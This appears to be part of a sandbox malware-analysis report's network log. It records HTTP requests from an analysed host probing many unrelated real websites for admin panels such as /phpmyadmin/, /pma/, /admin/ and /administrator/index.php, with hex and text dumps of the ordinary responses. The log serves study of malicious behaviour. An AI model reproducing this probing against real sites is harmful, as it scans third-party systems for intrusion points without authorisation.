                                                                                                                                                                                                                                                                                                                                                                Data Raw: 33 33 32 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 20 43 72 65 61 74 65 64 20 62 79 20 65 78 63 6f 72 65 20 2d 20 53 6e 61 6b 65 20 76 31 2e 38 30 38 20 2d 20 64 6f 62 6f 73 2e 6f 6c 69 76 65 72 40 6e 73 69 6e 66 6f 2e 68 75 20 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 49 6e 6e 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 79 73 74 65 6d 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6c 61 67 73 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6c 65 61 72 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 6e 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 0d 0a 09 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 332b<!DOCTYPE html>... Created by excore - Snake v1.808 - dobos.oliver@nsinfo.hu --><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.654617071 CET1286INData Raw: 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="/sites/default/css/main.css?v=1.808" /><link rel="stylesheet" media=print href="/sites/default/css/print.css?v=1.808" /><link rel="styleshee
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.654654980 CET1286INData Raw: 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 6a 71 75 65 72 79 2e 75 69 2e 65 66 66 65 63 74 2d 66 61 64 65 2e 6d 69 6e 2e 6a 73 22 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script type="text/javascript" src="/js/jquery/ui/jquery.ui.effect-fade.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.datepicker.min.js"></script><script type="text/javascript" src="/js/jquery/jquery.auto
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.654711008 CET1286INData Raw: 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 65 75 2f 70 6c 2f 70 6d 61 2f 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 72 6f 22 20 68 72 65 66 3d 22 68 74 74 70 3a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: vationdevelopment.eu/pl/pma/" /><link rel="alternate" hreflang="ro" href="http://innovationdevelopment.eu/ro/pma/" /><link rel="alternate" hreflang="sk" href="http://innovationdevelopment.eu/sk/pma/" /><link href="images/favicon.png"
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.654766083 CET1286INData Raw: 64 65 66 61 75 6c 74 2f 63 6f 6e 74 65 6e 74 2f 61 6a 61 78 2f 66 62 77 2e 70 68 70 3f 6d 3d 67 79 65 6e 67 65 6e 6c 61 74 6f 27 22 3e 0d 0a 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 66 62 77 2e 67 69 66 22 20 73 74 79 6c 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: default/content/ajax/fbw.php?m=gyengenlato'"><img src="/images/fbw.gif" style="max-width:24px;max-height:24px;width:auto;height:auto;" alt="Low vision version" /></a><a href="javascript:void();" role="button" title="extra larg
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.654804945 CET1286INData Raw: 6e 6e 6f 6d 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 65 6e 2f 69 6d 73 2f 77 68 61 74 2d 69 73 2d 69 74 22 3e 49 4d 53 3c 2f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nnome" /></a></div><div class="menu"><a href="/en/ims/what-is-it">IMS</a><a href="/en/project/about">Project</a><a href="/en/outputs/guide">Outputs</a><a href="/en/contact">Contact</a></div><div class="ba
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.654856920 CET1286INData Raw: 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4c 41 57 5f 63 6f 6f 6b 69 65 5f 61 6c 65 72 74 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 3e 0d 0a 09 09 09 42 79 20 75 73 69 6e 67 20 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ;</script><div class="LAW_cookie_alert" style="display:block;">By using this site you agree that this site uses cookies.<br><a href="javascript:void();" onClick="LAWsetCookie('cookie_allowed',1,60);$(this).parent().fadeOut(1
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.654895067 CET1286INData Raw: 74 68 65 20 77 65 62 73 69 74 65 20 75 73 65 72 27 73 20 63 6f 6d 70 75 74 65 72 20 6f 72 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 2c 20 77 68 69 63 68 20 69 73 20 6d 61 6e 61 67 65 64 20 62 79 20 74 68 65 20 62 72 6f 77 73 65 72 20 28 65 67 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: the website user's computer or mobile device, which is managed by the browser (eg. unique ID, website names, numbers and alphabetical character). <br> <b> types of cookies </ b> <br> Storage in terms of two different types of people, the word
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.654931068 CET1286INData Raw: 65 72 2c 20 74 6f 20 72 65 6a 65 63 74 20 69 74 2e 20 3c 62 72 3e 20 64 69 73 61 62 6c 65 20 74 68 65 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 72 65 71 75 65 73 74 65 64 20 74 6f 20 6d 61 6b 65 20 74 68 65 20 6e 65 63 65 73 73 61 72 79 20 73 65 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: er, to reject it. <br> disable the cookies are requested to make the necessary settings on the computer or mobile device Internet browser / browser's settings menu (ban, withdrawal). <br> This website uses cookies to <br> only for the correct
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.654967070 CET1286INData Raw: 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 6c 6f 67 6f 73 22 3e 3c 70 3e 3c 69 6d 67 20 61 6c 74 3d 22 22 20 73 72 63 3d 22 2f 63 6b 66 69 6e 64 65 72 2f 75 73 65 72 66 69 6c 65 73 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 5f 6e 66 2e 70 6e 67 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: v class="footer_logos"><p><img alt="" src="/ckfinder/userfiles/images/logo_nf.png" style="height:35px; width:91px" /> <img alt="" src="/ckfinder/userfiles/images/TREBAG_nagyon_uj_angol.png" style="height:35px; width:91px" /> <img alt="" src="/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.665245056 CET775INData Raw: 76 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 74 69 74 6c 65 22 3e 47 65 74 20 74 68 65 20 6c 61 74 65 73 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 65 20 70 72 6f 6a 65 63 74 21 3c 2f 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: v><div class="footer_title">Get the latest information about the project!</div><div class="footer_newsletter"><form action="/en/newsletter" method="POST"><input type="text" name="email" placeholder="Leave your e-mail


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                429192.168.2.66295836.255.71.4580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.365714073 CET176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: instructory.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.735564947 CET150INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://instructory.net/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                430192.168.2.66329031.13.88.180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.378252983 CET179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: th-th.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.480612993 CET213INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://th-th.facebook.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                431192.168.2.662999185.78.166.13080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.387835979 CET215OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.732858896 CET408INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                432192.168.2.663172181.4.228.15580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.411340952 CET183OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.675556898 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.675595999 CET151INData Raw: 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                433192.168.2.663176181.4.228.15580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.416757107 CET181OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.688494921 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 